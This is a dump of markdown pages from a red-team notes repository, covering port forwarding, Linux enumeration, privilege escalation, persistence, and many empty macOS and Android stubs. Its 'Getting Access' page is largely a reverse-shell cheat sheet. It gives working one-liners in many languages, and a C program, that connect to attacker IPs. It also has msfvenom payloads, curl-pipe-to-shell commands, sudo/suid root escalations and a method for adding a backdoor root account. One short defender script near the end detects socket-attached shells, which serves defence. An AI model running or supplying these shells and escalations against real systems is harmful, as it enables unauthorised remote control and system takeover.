ssh -f -N -R 8000:10.3.3.14:80 -R 4443:10.3.3.14:443 -R 33306:10.3.3.14:3306 -R 33389:10.3.3.14:3389 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key kali@192.168.19.57

# kill with
ps -C ssh
kill -9
```

#### If you already have an SSH session

```bash
-R 8081:172.24.0.2:80 # (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
# :8081<------------:80
# Now you can access 172.24.0.2:80, which you didn't have direct access to


-L 8083:127.0.0.1:8084 # (on your machine listen on 8083, send it to my Kali machine on 8084)
# :8084<------------:8083<------------:XXXX
# run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it


# For reverse shell (-f elf: the payload is a Linux binary, so an ELF, not a Windows exe):
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f elf -o shell
# Run it on the 2nd remote target to get a shell on Kali
```

#### If you didn't have an SSH session

First, SSH to your Kali from the target machine.

On Kali:

```bash
service ssh start
# "add a user, give it /bin/false in /etc/passwd"
# -N: do not request a remote command, which is required because the account's shell is /bin/false
ssh -N -R 12345:192.168.122.228:5986 test@10.1.1.1
```

## Port Forwarding (Single port to one port)

### Using Socat

For linux

Forward your 8083 to 10.39.0.2:443

```bash
./socat TCP4-LISTEN:8083,fork TCP4:10.39.0.2:443
```

### Using Chisel

Most platforms

Remote static tunnels "port to port":

```bash
#On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

#General command:
./chisel client $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT
```

#### Remote tunnels "access IP:PORT you couldn't access before":

```bash
#On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
```

#### Local tunnels "listen on the target for something, and send it to us":

```bash
#On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
```

### Using Metasploit

Get a meterpreter session, then:

```bash
portfwd add -l 4445 -p 4443 -r 10.1.1.1
# Use -R to make it reverse
```

### Using Plink.exe

Just like SSH, but Windows only. Part of the PuTTY toolset.

```bash
#On Attacker
service ssh start
cp /usr/share/windows-binaries/plink.exe . # then transfer the copy to the target machine
```

```bash
#On Target:
plink.exe 10.10.10.123 -P 22 -C -N -L 0.0.0.0:4445:10.10.10.123:4443 -l $KALIUSER -pw $PASS
```

## Dynamic Port Forwarding (Single port to any remote port)

* Set up proxychains with socks5 on 127.0.0.1:1080
* Or set up a socks5 proxy in Firefox

> For nmap use `-Pn -sT` or use the TCP scanner in msf

```sh
ssh -i bobs.key -p 2222 bob@10.10.10.123 -D1080
```

### Using Chisel

```bash
#On Kali:
./chisel server -p 8000 -reverse

#On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5

#On Kali:
./chisel client 127.0.0.1:8001 socks
```

### Using Metasploit

* Get a meterpreter session
* Auto route (multi/manage/autoroute)
* Start a socks proxy (auxiliary/server/socks4a)

## Forward ports using built-in firewall

### Using iptables

To set up a port forwarder using iptables, run the commands below as root (or with sudo).

```bash
echo '1' > /proc/sys/net/ipv4/conf/eth0/forwarding
iptables -t nat -A PREROUTING -p tcp -i eth0 --dport $lport -j DNAT --to-destination $ip:$rport
iptables -A FORWARD -p tcp -d $ip --dport $rport -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
```

## Port Forwarding with netcat

Forward traffic using netcat and a named pipe.

```bash
mknod $mypipe p
nc -l -p $lport < $mypipe | nc $ip $rport > $mypipe
```

--------------------------------------------------------------------------------
/linux-1/linux.md:
--------------------------------------------------------------------------------

---
description: 'Sorted Linux notes, need to separate to different pages and reorganize'
---

# Linux Notes

## Linux

Website for searching for shells through random programs such as 'vi' ("living off the land binaries"): [GTFObins](https://gtfobins.github.io/)

### Enumeration

find files the user has access to:

```bash
find / -user -ls 2>/dev/null
```

`which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null` - Check whether each of these useful programs is installed on the machine (only shows the ones currently installed).

[Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py)

full linux enumeration:

* [LinEnum.sh](https://github.com/rebootuser/LinEnum)
* [LinPEAS.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

download **and** execute a script (such as LinEnum.sh) [from a remote host]: `curl /LinEnum.sh | bash`

Locate exploits:

```bash
searchsploit

#to pull exploit code:
searchsploit -x
```

enumerate running processes: [`pspy`](https://github.com/DominicBreuker/pspy)

`ps -U root -u root ux` View all processes started by a certain user (`root` in this case)

enumeration multi-tool: [Sparta](https://sparta.secforce.com/) (does nmap, hydra, nikto, sqlscan, ssl...)

Semi-automated enumeration all-in-one (use this!): [nmapAutomator](https://github.com/21y4d/nmapAutomator)

Unix hardening tool that can be used for enumeration: [Bastille](http://bastille-linux.sourceforge.net/)

enumerate info about currently running processes from: `/proc/self/status`

### Upgrade shells:

```text
1. python -c 'import pty; pty.spawn("/bin/sh")'
2. perl -e 'exec "/bin/sh";'
3. ruby -e 'exec "/bin/sh"'
```

To upgrade to a fully interactive shell (python example):

```bash
python -c 'import pty;pty.spawn("/bin/bash")';
ctrl-z #[to background]
stty raw -echo;
fg #[to return shell to foreground]
export TERM=xterm
```

php shell: ``

bash reverse shell:

```text
bash -i >& /dev/tcp/10.10.14.148/9001 0>&1

#URL encoded:
bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261
```

### Privilege Escalation

[https://payatu.com/guide-linux-privilege-escalation](https://payatu.com/guide-linux-privilege-escalation)

list the user's sudo permissions: `sudo -l`

execute any command while in `less`: `!`

Privilege Escalation to Root by setting suid on `/bin/less`: `chmod 47555 /bin/less`

Privilege Escalation to Root with `find`: `sudo find /etc -exec sh -i \;`

wildcard injection: [NEED MORE HERE]

```bash
mawk 'BEGIN {system("/bin/sh")}'
```

If your user can `sudo` any of these text editors:

```bash
1. [user@localhost]$ sudo vi
2. :shell
3. [root@localhost]#

1. [user@localhost]$ sudo less file.txt
2. !bash
3. [root@localhost]#

1. [user@localhost]$ sudo more long_file.txt
2. !bash
3. [root@localhost]#
Note: for this method to work, the attacker has to read a file that is longer than one page
```

### Remote Code Execution

[https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/](https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/) Run commands on a remote system without a shell through SSH with a "Herefile"

```text
ssh server1 << HERE
command1
command2
HERE
```

### Misc Linux

Raw memory location, so no files on disk: `/dev/shm/`

list all running commands:

```bash
ps -eo command
#change the delimiter to \n instead of a space (loop by line):
IFS=$'\n'
#Then loop through each line of the output:
for i in $(ps -eo command); do echo $i; done
```

[https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents](https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents) script to copy the contents of a file directly to the clipboard; save it in a PATH location, then enjoy!

```text
#! /bin/bash
xclip -selection clipboard -i $@
```

'new' netstat: `ss -lnp | grep 9001` #check if any connections on port 9001

copy files to the local machine without a file transfer:

```bash
base64 -w 0 /path/of/file/name.file
#copy the base64 output, then paste it after echo -n on the local machine:
echo -n | base64 -d > filename.file
```

pretty print JSON text in the console ([https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/](https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/)). Pipe the JSON output to `jq`.
Example from the NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq`

### Check encoding of a text file

`vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' ` check the encoding of a text file (needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_) [https://vim.fandom.com/wiki/Bash_file_encoding_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) (how to make an alias for the above command)

--------------------------------------------------------------------------------
/linux-1/linux/README.md:
--------------------------------------------------------------------------------

---
description: 'Sorted Linux notes, need to separate to different pages and reorganize'
---

# Red Team Notes

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Linux

Website for searching for shells through random programs such as 'vi' ("living off the land binaries"): [GTFObins](https://gtfobins.github.io/)

## Remote Code Execution

Run commands on a remote system without a shell through SSH with a "Herefile". `HERE` can be anything, but it must begin and end with the same word.
[https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/](https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/)

```text
ssh @ << HERE


HERE
```

## Misc Linux

Raw memory location, so no files on disk: `/dev/shm/`

list all running commands:

```bash
ps -eo command
#change the delimiter to \n instead of a space (loop by line):
IFS=$'\n'
#Then loop through each line of the output:
for i in $(ps -eo command); do echo $i; done
```

[https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents](https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents) script to copy the contents of a file directly to the clipboard; save it in a PATH location, then enjoy!

```text
#! /bin/bash
xclip -selection clipboard -i $@
```

'new' netstat: `ss -lnp | grep 9001` #check if any connections on port 9001

copy files to the local machine without a file transfer:

```bash
base64 -w 0 /path/of/file/name.file
#copy the base64 output, then paste it after echo -n on the local machine:
echo -n | base64 -d > filename.file
```

pretty print JSON text in the console ([https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/](https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/)). Pipe the JSON output to `jq`.
Example from the NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq`

### Check encoding of a text file

`vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' ` check the encoding of a text file (needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_) [https://vim.fandom.com/wiki/Bash_file_encoding_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) (how to make an alias for the above command)

--------------------------------------------------------------------------------
/linux-1/linux/enumeration.md:
--------------------------------------------------------------------------------

# Enumeration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

### Enumeration

find files the user has access to:

```bash
find / -user -ls 2>/dev/null
```

`which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null` - Check whether each of these useful programs is installed on the machine (only shows the ones currently installed).

[Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py)

full linux enumeration:

* [LinEnum.sh](https://github.com/rebootuser/LinEnum)
* [LinPEAS.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

download **and** execute a script (such as LinEnum.sh) [from a remote host]: `curl /LinEnum.sh | bash`

Locate exploits:

```bash
searchsploit

#to pull exploit code:
searchsploit -x
```

enumerate running processes: [`pspy`](https://github.com/DominicBreuker/pspy)

`ps -U root -u root ux` View all processes started by a certain user (`root` in this case)

enumeration multi-tool: [Sparta](https://sparta.secforce.com/) (does nmap, hydra, nikto, sqlscan, ssl...)

Semi-automated enumeration all-in-one (use this!): [nmapAutomator](https://github.com/21y4d/nmapAutomator)

Unix hardening tool that can be used for enumeration: [Bastille](http://bastille-linux.sourceforge.net/)

enumerate info about currently running processes from: `/proc/self/status`

--------------------------------------------------------------------------------
/linux-1/linux/getting-access.md:
--------------------------------------------------------------------------------

# Getting Access

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Reverse Shells

TODO: description and methodology for each section (as needed)

### Reverse Shell as a Service - [https://shell.now.sh](https://shell.now.sh)

[https://github.com/lukechilds/reverse-shell](https://github.com/lukechilds/reverse-shell)

```bash
curl https://shell.now.sh/: | sh
```

### **Bash Reverse Shells**

#### **TCP:**

```bash
bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
```

#### **UDP:**

```bash
sh -i >& /dev/udp/192.168.1.2/5555 0>&1
```

### Python Reverse Shells

```python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.57",8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

```python
export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

### **PHP Reverse Shell**

```php
php -r '$sock=fsockopen("192.168.1.2",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```php
php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
```

simple php command injection: ``

### **Ruby Reverse Shell**

```ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

### **Telnet Reverse Shells**

```bash
telnet ATTACKING-IP 80 | /bin/bash | telnet 192.168.1.2 4444
```

```bash
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p
```

### **Netcat Reverse Shells**

```bash
nc -e /bin/sh 192.168.1.2 80
```

```bash
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p
```

### **Socat Reverse Shell**

```text
socat tcp-connect:: exec:"bash -li",pty,stderr,setsid,sigint,sane
```

### **Golang Reverse Shell**

```text
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```

### **Perl Reverse Shell**

```text
perl -e 'use Socket;$i="192.168.1.2";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### **Awk Reverse Shell**

```text
awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```

### **NodeJS Reverse Shell**

```text
require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444')
```

### **C Reverse Shell**

```text
#include
#include
#include
#include
#include

int main()
{
    const char* ip = "192.168.1.2";
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(4444);
    inet_aton(ip, &addr.sin_addr);
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    for (int i = 0; i < 3; i++)
    {
        dup2(sockfd, i);
    }
    execve("/bin/sh", NULL, NULL);
    return 0;
}
```

### **Meterpreter Reverse Shells**

* **Linux Non-Staged reverse TCP**

```text
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
```

* **Linux Staged reverse TCP**

```text
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
```

## Upgrading remote shells

### Upgrade to fully interactive shell (python example):

```bash
python -c 'import pty;pty.spawn("/bin/bash")';
ctrl-z #send to background
stty raw -echo #https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-x
stty -a #get local number of rows & columns
fg #to return shell to foreground
stty rows columns #Set remote shell to x number of rows & y columns
export TERM=xterm-256color #allows you to clear console, and have color output
```

### Other Languages:

```text
1. python -c 'import pty; pty.spawn("/bin/sh")'
2. perl -e 'exec "/bin/sh";'
3. ruby -e 'exec "/bin/sh"'
```

## Misc unsorted

```bash
bash -i >& /dev/tcp/10.10.14.148/9001 0>&1

#URL encoded:
bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261
```

#### Bash

Some versions of [bash can send you a reverse shell](http://www.gnucitizen.org/blog/reverse-shell-with-bash/) (this was tested on Ubuntu 10.10):

```text
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

#### PERL

Here’s a shorter, feature-free version of the [perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell):

```text
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

There’s also an [alternative PERL reverse shell here](http://www.plenz.com/reverseshell).

#### Python

This was tested under Linux / Python 2.7:

```text
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

#### PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

```text
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```

If you want a .php file to upload, see the more featureful and robust [php-reverse-shell](http://pentestmonkey.net/tools/web-shells/php-reverse-shell).
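Every one-liner in this section, whatever the language, ends in the same state: a shell whose stdin, stdout and stderr are the same network socket (the `dup2` loop in the C and Python versions makes that explicit). That state is also what a defender can look for. The script below is an added example, not part of the original notes: it walks `/proc` and flags any process whose fds 0, 1 and 2 all point at sockets. `PROC_ROOT` is a hypothetical override used only so the check can be exercised against a constructed fake `/proc` tree.

```shell
#!/usr/bin/env bash
# Added defender-side check (not from the original notes): report processes
# whose stdin, stdout and stderr are all sockets, the signature every reverse
# shell above leaves behind. PROC_ROOT (hypothetical, for testing) lets the
# check run against a constructed fake /proc tree instead of the real one.
PROC_ROOT="${PROC_ROOT:-/proc}"

# check_pid PID: print "PID COMM" and return 0 if fds 0, 1 and 2 of PID are
# all sockets; return 1 (printing nothing) otherwise or if PID has vanished.
check_pid() {
    local pid="$1" fd target comm
    comm=$(cat "$PROC_ROOT/$pid/comm" 2>/dev/null) || return 1
    for fd in 0 1 2; do
        # /proc/PID/fd/N is a symlink whose target names the open object,
        # e.g. "socket:[12345]", "/dev/pts/0" or "pipe:[678]".
        target=$(readlink "$PROC_ROOT/$pid/fd/$fd" 2>/dev/null) || return 1
        case "$target" in
            'socket:['*) ;;      # a socket: keep checking the remaining fds
            *) return 1 ;;       # tty, pipe or file: not a socket-attached shell
        esac
    done
    printf '%s %s\n' "$pid" "$comm"
    return 0
}

# scan_socket_shells: run check_pid over every numeric entry under PROC_ROOT.
# Returns 0 if at least one socket-attached process was found, 1 otherwise.
scan_socket_shells() {
    local dir pid found=1
    for dir in "$PROC_ROOT"/[0-9]*; do
        [ -d "$dir" ] || continue
        pid="${dir##*/}"
        if check_pid "$pid"; then found=0; fi
    done
    return $found
}

# make_fake_proc DIR: build a constructed /proc look-alike so the scan can be
# exercised offline. Dangling symlinks are enough: readlink only reports the
# link target, exactly as it does for a live /proc/PID/fd entry.
make_fake_proc() {
    local root="$1" fd
    # pid 100: an ordinary interactive shell on a pseudo-terminal
    mkdir -p "$root/100/fd" && echo bash > "$root/100/comm"
    for fd in 0 1 2; do ln -s /dev/pts/0 "$root/100/fd/$fd"; done
    # pid 200: a shell with all three stdio fds on one socket (reverse shell)
    mkdir -p "$root/200/fd" && echo sh > "$root/200/comm"
    for fd in 0 1 2; do ln -s 'socket:[12345]' "$root/200/fd/$fd"; done
    # pid 300: a daemon writing to a socket but reading stdin from /dev/null
    mkdir -p "$root/300/fd" && echo nc > "$root/300/comm"
    ln -s /dev/null "$root/300/fd/0"
    ln -s 'socket:[4242]' "$root/300/fd/1"
    ln -s 'socket:[4242]' "$root/300/fd/2"
}

# Run with --demo to scan the constructed tree; run with no arguments as root
# to scan the real /proc of the current host.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp -d)
    make_fake_proc "$tmp"
    PROC_ROOT="$tmp"
    scan_socket_shells      # prints: 200 sh
    rm -rf "$tmp"
elif [ "${1:-}" = "" ]; then
    scan_socket_shells
fi
```

Socket-activated services (inetd or systemd `.socket` units) legitimately run with a socket on their stdio, so treat a hit as a triage lead and confirm with the process name, its parent and the peer address from `ss -tnp`.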

#### Ruby

```text
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

#### Netcat

Netcat is rarely present on production systems, and even if it is there are several versions of netcat, some of which don’t support the -e option.

```text
nc -e /bin/sh 10.0.0.1 1234
```

If you have the wrong version of netcat installed, [Jeff Price points out here](http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-127498) that you might still be able to get your reverse shell back like this:

```text
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```

#### Java

```text
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

#### xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

```text
xterm -display 10.0.0.1:1
```

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).
One way to do this is with Xnest (to be run on your system):

```text
Xnest :1
```

You’ll need to authorize the target to connect to you (command also run on your host):

```text
xhost +targetip
```

## Resources

* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html](https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html)

--------------------------------------------------------------------------------
/linux-1/linux/persistance.md:
--------------------------------------------------------------------------------

# Persistence

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Cron

## Startup Scripts

Add a script to run at startup: `update-rc.d defaults` (needs 755 permissions)

## Accounts

### Add Account and/or Password to /etc/passwd

Generate password:

`openssl passwd -1 -salt `

Then add it to the `/etc/passwd` file. The format is: `::::root:/root:/bin/bash`

--------------------------------------------------------------------------------
/macos/hardening-and-configuration.md:
--------------------------------------------------------------------------------

# Hardening & Configuration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.
You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)

## Resources

* [https://github.com/ernw/hardening/blob/master/operating_system/osx/10.14/ERNW_Hardening_OS_X_Mojave.md](https://github.com/ernw/hardening/blob/master/operating_system/osx/10.14/ERNW_Hardening_OS_X_Mojave.md)

--------------------------------------------------------------------------------
/macos/macos-basics.md:
--------------------------------------------------------------------------------

# MacOS Basics

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/macos/macos-hardening.md:
--------------------------------------------------------------------------------

# Hardening & Configuration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

## Resources

* [https://github.com/ernw/hardening/blob/master/operating_system/osx/10.14/ERNW_Hardening_OS_X_Mojave.md](https://github.com/ernw/hardening/blob/master/operating_system/osx/10.14/ERNW_Hardening_OS_X_Mojave.md)

--------------------------------------------------------------------------------
/macos/macos-redteam/README.md:
--------------------------------------------------------------------------------

# Red Team Notes

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

MacOS is Unix-based. Therefore, a lot of things that work for Linux may also work here. I will not duplicate notes between the two, but may make links to things that I know work across the systems.

--------------------------------------------------------------------------------
/macos/macos-redteam/enumeration.md:
--------------------------------------------------------------------------------

# Enumeration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/macos/macos-redteam/getting-access.md:
--------------------------------------------------------------------------------

# Getting Access

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/macos/macos-redteam/persistence.md:
--------------------------------------------------------------------------------

# Persistence

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/macos/macos-redteam/privilege-escalation.md:
--------------------------------------------------------------------------------

# Privilege Escalation

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.
You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/macos/red-team-notes/README.md:
--------------------------------------------------------------------------------

# Red Team Notes

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)

MacOS is Unix-based. Therefore, a lot of things that work for Linux may also work here. I will not duplicate notes between the two, but may make links to things that I know work across the systems.

--------------------------------------------------------------------------------
/macos/red-team-notes/enumeration.md:
--------------------------------------------------------------------------------

# Enumeration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.
You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)

--------------------------------------------------------------------------------
/macos/red-team-notes/getting-access.md:
--------------------------------------------------------------------------------

# Getting Access

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)

--------------------------------------------------------------------------------
/macos/red-team-notes/persistence.md:
--------------------------------------------------------------------------------

# Persistence

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)

--------------------------------------------------------------------------------
/macos/red-team-notes/privilege-escalation.md:
--------------------------------------------------------------------------------

# Privilege Escalation

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)

--------------------------------------------------------------------------------
/mobile/android.md:
--------------------------------------------------------------------------------

# Android

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
